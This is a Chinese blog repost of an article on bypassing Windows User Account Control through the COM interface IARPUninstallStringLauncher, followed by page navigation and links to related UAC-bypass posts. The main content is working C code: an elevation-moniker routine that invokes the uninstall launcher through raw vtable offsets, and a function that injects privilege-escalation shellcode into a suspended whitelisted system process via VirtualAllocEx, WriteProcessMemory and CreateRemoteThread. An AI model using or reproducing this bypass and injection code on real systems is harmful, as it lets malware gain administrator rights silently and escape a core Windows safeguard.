巧用COM接口IARPUninstallStringLauncher绕过UAC

最新推荐文章于 2024-04-25 18:21:13 发布
最新推荐文章于 2024-04-25 18:21:13 发布
阅读量1.1k 收藏
点赞数
分类专栏: WINDOWS API应用开发

巧用COM接口IARPUninstallStringLauncher绕过UAC

http://www.freebuf.com/articles/system/116611.html

编码实现绕过UAC的功能

核心提权代码

HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv)

{	

	BIND_OPTS3 bo;

	WCHAR  wszCLSID[50];

	WCHAR  wszMonikerName[300];

	

	StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0])); 

	HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName)/sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);

	if (FAILED(hr))

		return hr;

	memset(&bo, 0, sizeof(bo));

	bo.cbStruct = sizeof(bo);

	bo.hwnd = hwnd;

	bo.dwClassContext  = CLSCTX_LOCAL_SERVER;

	return CoGetObject(wszMonikerName, &bo, riid, ppv);

}

								

int _tmain(int argc, _TCHAR* argv[])

{		

	CLSID  clsid;

	IID iid;

	LPVOID ppv = NULL;

	HRESULT hr;

	PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait pfn_LaunchUninstallStringAndWait = NULL;

	PFN_IARPUninstallStringLauncher_Release pfn_IARPUninstallStringLauncher_Release = NULL;

	

	if (IIDFromString(L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}", &clsid) ||

		IIDFromString(L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}", &iid))

	return 0;

	

	CoInitialize(NULL);

		

	hr = CoCreateInstanceAsAdmin(NULL, clsid, iid, &ppv);

	

	if (SUCCEEDED(hr))

	{

			pfn_LaunchUninstallStringAndWait  = (PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait)(*(DWORD*)(*(DWORD*)ppv + 12));

			pfn_IARPUninstallStringLauncher_Release = (PFN_IARPUninstallStringLauncher_Release)(*(DWORD*)(*(DWORD*)ppv + 8));

			

			if (pfn_LaunchUninstallStringAndWait && pfn_IARPUninstallStringLauncher_Release)

			{

				pfn_LaunchUninstallStringAndWait((LPVOID*)ppv, 0, L"{18E78D31-BBCC-4e6f-A21D-0A15BBC62D49}", 0, NULL);

				pfn_IARPUninstallStringLauncher_Release((LPVOID*)ppv);

			}

	}

	

	CoUninitialize();

	

	return 0;

}

为什么呢?因为执行该提权代码宿主的身份是不可信的,所以我们需要想办法让这段代码在windows的白名单程序中运行.所以很直接的会想到将这段代码注入到诸如计算器,记事本,桌面等等程序中去执行,这样就不会弹出UAC框了。

将提权代码转换为shellcode并注入到白名单程序中执行

关键代码:

BOOL BypassUacWithInject(LPTSTR lpExe)

{

	HMODULE hModule = GetModuleHandle(NULL);

	TCHAR cAppName[MAX_PATH] = {0};

	STARTUPINFO si;

	PROCESS_INFORMATION pi;

	LPVOID lpMalwareBaseAddr;

	LPVOID lpNewVictimBaseAddr;

	HANDLE hThread;

	DWORD dwExitCode;

	BOOL bRet = FALSE;

	lpMalwareBaseAddr = g_ByPassUac;

	AddUninstallItem(lpExe);

	GetSystemDirectory(cAppName, MAX_PATH);

	_tcscat(cAppName, InjectTarget);

	ZeroMemory(&si, sizeof(si));

	si.cb = sizeof(si);

	ZeroMemory(&pi, sizeof(pi));

	if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,	NULL, NULL,	&si, &pi) == 0)

	{

		return bRet;

	}

	lpNewVictimBaseAddr = VirtualAllocEx(pi.hProcess,

		NULL,

		SizeOfBypassUac,

		MEM_COMMIT | MEM_RESERVE,

		PAGE_EXECUTE_READWRITE);

	if (lpNewVictimBaseAddr == NULL)

	{

		return bRet;

	}

	WriteProcessMemory(pi.hProcess, lpNewVictimBaseAddr, (LPCVOID)lpMalwareBaseAddr, SizeOfBypassUac, NULL);

	hThread = CreateRemoteThread(pi.hProcess, 0, 0, (LPTHREAD_START_ROUTINE)lpNewVictimBaseAddr, NULL, 0, NULL);

	WaitForSingleObject(pi.hThread, INFINITE);

	GetExitCodeProcess(pi.hProcess, &dwExitCode);

	TerminateProcess(pi.hProcess, 0);

	DeleteUninstallItem();

	return bRet;

}

一瓶不满半瓶晃
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
64位下绕过UAC源代码
04-28
在这个场景中,"VS2008TestUACx64"可能是使用Visual Studio 2008创建的一个项目,专门用于测试如何在64位Windows 7上绕过UAC。这个项目可能包含了一些特殊的编程技巧或者利用了某些系统漏洞,以实现无提示或者非交互...
IARPUninstallStringLauncher绕过UAC
ooyyee的专栏
11-02 535
巧用COM接口IARPUninstallStringLauncher绕过UAC http://www.freebuf.com/articles/system/116611.html
USB设备的音频类UAC
最新发布
dddds222_的博客
04-25 1564
根据interface的class和subclass值可以区分interface类型,比如video的class值是14,audio的class值是1等,根据这个可以识别复合设备的interface。每个endpoint存在不同的数据格式,比如我在项目中使用的多个usb麦克风,有的MIC每个endpoint对应一种格式,比如双通道/16位/48KHZ。但也有一个endpoint对应多种格式的。UAC(USB Audio Class)是USB设备的音频类,它定义了USB音频设备与主机计算机通信的方式。
BypassUAC------巧用COM接口IARPUninstallStringLauncher绕过UAC
moonhillcity的博客
10-20 868
参考freebuf文章: http://www.freebuf.com/articles/system/116611.html
uninstall software using uninstallString
爱.NET
05-04 260
1. read uninstallString 2. parse the string 3. run command line
UACC接口服务调用
收破烂的小熊猫
09-17 3388
UACC接口对接 准备工作 查看业务service层项目pom文件是否有引入uacc相关依赖,为后面接口调用做环境配置 <dependency> <groupId>com.hrt.framework.uac</groupId> <artifactId>unified-authenticati...
bypassuac:绕过uac
05-13
bypassuac###example:bypassuac.exe "/c echo 1 >> c:\\3333"bypassuac.exe "/c powershell -c "aaaa"bypassuac,exe system###题外话:只能编译成32位. 多重指针写起来太麻烦,所以patch peb用内嵌汇编写的. 想编译成x...
Win7下绕过UAC代码
12-07
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); void RefreshProcs(HWND hWnd); int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) ...
UAC绕过工具Sigcheck、Strings
11-17
标题中的“UAC绕过工具Sigcheck、Strings”是指在信息技术领域中,两个被用于特殊目的的实用程序,即Sigcheck和Strings,它们有时可能被安全研究人员或恶意软件分析员利用来规避操作系统的用户账户控制(User ...
WinPwnage:UAC绕过,提升,持久性方法
02-24
该项目的作者对使用此工具概不负责。 建筑 此版本适用于Python> = 3.6,并将.exe文件放入dist目录。 使用pip命令安装pyinstaller: pip install pyinstaller 并运行以下命令: pyinstaller --onefile main.py ...
UAC协议讲解
热门推荐
申小白
02-17 1万+
一、简介 UAC是USB Audio Class的缩写,有时也叫UAD,UAD是USB Audio Device的缩写。 UAC/UAD定义了在USB规范下实现音频的设备的实现和控制功能,这些功能包括不仅音频数字部分的,也包括模拟部分。这些音频数据(模拟和数字)和用于直接控制音频环境的功能,如音量和音调控制。这个音频设备类不包括操作与音频数据的复制,如磁带传输机制或CD-ROM驱动器控制。 UAC 目前的发展已经经历了1.0 ,2.0 到现在的3.0. win10目前只支持到UAC2.0 注意:UAC3.0
UAC2.0 描述符 (一)
weixin_34174105的博客
07-07 1823
2019独角兽企业重金招聘Python工程师标准>>> ...
图解ARP协议(六)RARP与IARP:被遗忘的兄弟协议
weixin_34007886的博客
09-05 253
一、概述在我第一次接触ARP协议的时候,发现这协议挺简单的,"一去一回通过IP拿到MAC地址",整个过程在1s内就搞定了。后面学到了代理ARP,发现也不过是变了个法子,做了次"欺骗",本质还是一样。接下来又学到了免费ARP,顿时觉得网络协议设计者太牛了,一个协议居然能折腾出这么多玩法,连"地址检测"都能实现。等学到了ARP嗅探和欺骗,又发现其实黑帽子更爱折腾,谁能想到这么简单...
java虚拟机绕过_白名单绕过UAC方法原理介绍
weixin_42501688的博客
03-02 577
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言UAC(User AccountControl)是从Windows Vista开始出现的安全技术,它通过限制应用程序的执行权限来达到提升操作系统安全性的目的。在开启UAC的前提下,即使用户使用的是管理员账户登录,默认也只能获取标准权限,当用户某些动作可能会影响系统的安全及稳定性时...
修改注册表绕过uac
10-13
具体操作如下:打开注册表编辑器,找到 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers,添加需要绕过UAC的程序路径,然后在数值数据中添加 RUNASADMIN。这样就可以绕过UAC...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值